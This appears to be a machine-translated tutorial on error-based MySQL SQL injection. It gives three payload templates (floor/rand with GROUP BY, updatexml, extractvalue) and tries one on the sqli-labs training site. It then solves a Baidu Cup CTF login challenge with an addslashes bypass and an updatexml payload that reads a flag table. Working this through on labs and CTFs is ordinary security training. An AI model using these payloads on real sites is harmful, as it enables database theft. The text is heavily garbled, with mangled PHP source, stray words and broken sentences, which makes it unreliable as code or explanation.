0x00 background
Learn to record the injection of the error type, through the parties to organize and summarize their own formation.
All the injection principles are the same, that is, the user input is spliced execution. However, the background database execution statement generates an error and echoes back to the page when there may be an injection of an error.
0x01 concept
There are about 3 ways to use the error injection:
1:?id=2' and (Select 1 from(SelectCount (*), concat (Floor (rand (0)*2),(Select(Select(query statement))
fromInformation_schema.tables limit0,1)) x fromInformation_schema.tables GROUP by X) a)--+2:?id=2' And Updatexml (1, Concat (0x7e, (SELECT query statement),0x7e),1)--+3:?id=1' And Extractvalue (1, Concat (0x7e, (SelectQuery statement),0x7e))--+
For analysis of 1:
RAND (0) *2 will take 0 to 2 of the random number floor (rand () * *) Two records will be error floor (rand (0) ** COUNT (* GROUP BY When you group data, you'll see if the virtual table has this value, and if it doesn't, then count (* GROUP BY (rand (0) *) will be executed once, and if there is no record, the virtual table will be executed once
For the simultaneous presence of count (), Rand (), group by, and so on, you can refer to the dark cloud Tsafe article
For analysis of 2:
The function is in the form: Updatexml (xml_document, xpath_string, New_value);, first argument: Xml_document is a string format, the name of the XML Document object, Doc is the second parameter: xpath_string (a string in XPath format), the third argument: new_value,string format, which replaces the found matching data effect: Changing the value of the node in the document that matches the criteria, that is, changing the Xml_ Value in document that conforms to xpath_string
And our injection statement is: Updatexml (1,concat (0x7e, (SELECT query statement),0x7e),1)
The concat () function connects its arguments to a string and therefore does not conform to the xpath_string format, resulting in a malformed error message returned.
For analysis of 3:
Extractvalue (Xml_document, xpath_string); First argument: Xml_document is a string format, the name of the XML Document object The second parameter: xpath_string (a string in XPath format) . Function: Returns a string containing the queried value from the target XML
And our injection statement is: Extractvalue (1, concat (0x7e, (Select query statement), 0x7e))
The same 21 because it does not conform to the xpath_string format, it will error
0X03 Practice
Take Sqli lab as a test
? id=1 ' When:
? id=1 '% 23 o'clock:
Bring into the payload above:
Can see through the Xmlupdate successfully through the error message to display the database name, followed by the table, followed by the steps of the column
0x04 CTF Instance
I spring Baidu Cup October vid
This omits the information collection, directly to the SQL injection section
There is only one login box to post the source code:
1<?PHP2 3 require_once' Dbmysql.class.php ';4 require_once' Config.inc.php ';5 6 if(isset($_post[' username ']) &&isset($_post[' Password ']) &&isset($_post[' Number '])){7 $db=Newmysql_db ();8 $username=$db->safe_data ($_post[' username ']);9 $password=$db->MY_MD5 ($_post[' Password ']);Ten $number=Is_numeric($_post[' Number ']) ?$_post[' Number ']: 1; One A $username=Trim(Str_replace($number, ‘‘,$username)); - - $sql= "SELECT * from". " ' ". table_name." `"." where username= "." "."$username"."‘"; the $row=$db->query ($sql); - $result=$db->fetch_array ($row); - if($row){ - if($result["number"] = = =$number&&$result["password"] = = =$password){ + Echo"<script>alert (' Nothing here! ') </script> "; -}Else{ + Echo"<script> A alert (' Wrong password, old driver overturned! '); at function Jumpurl () { - location= ' login.html '; - } - setTimeout (' Jumpurl () ', +); -</script> "; - } in}Else{ - Exit(Mysql_error()); to } +}Else{ - Echo"<script> the alert (' User name password cannot be empty! '); * function Jumpurl () { $ location= ' login.html ';Panax Notoginseng } - setTimeout (' Jumpurl () ', +); the</script> "; + } A?>
Safe_data () Definition:
1 Public function safe_data ($value) {2 if(MAGIC_QUOTES_GPC) { 3 stripcslashes ($value); 4 }5 returnaddslashes($value); 6 }
Username is first escaped by Safe_data () after being passed in, and then processed by Str_replace () to remove the number and spaces contained in it, and finally execute the SQL query. In this case, the SQL query statement has splicing input, but it needs to close the single quotation mark. But username in the beginning with a single quotation mark when the incoming will be added to the backslash.
Read the I spring and Autumn forum writeup only understand can this structure:
number=0&username=test%00 '%23username escaped into test\0\ '%23then the replace operation becomes test\\ '%23single quotes escape, and because trim is used, you cannot use spaces to split fields, and you can use + to connect.
The final structure of the username is:
Username=admin%00 ' +and+updatexml (1,concat (1, (select+*+from+flag+limit+1), 1), 1)%23
You can only get 32-bit lengths here, and you need to use the SUBSTR function to get the full flag.
0X05 Summary
Here we use only updatexml as an example, the remaining 2 principles are the same.
At the same time for Sqli lab exercises using this kind of injection is very slow, then consider writing an automated script.
SQL error injection combined with SQLI lab and Baidu Cup CTF VId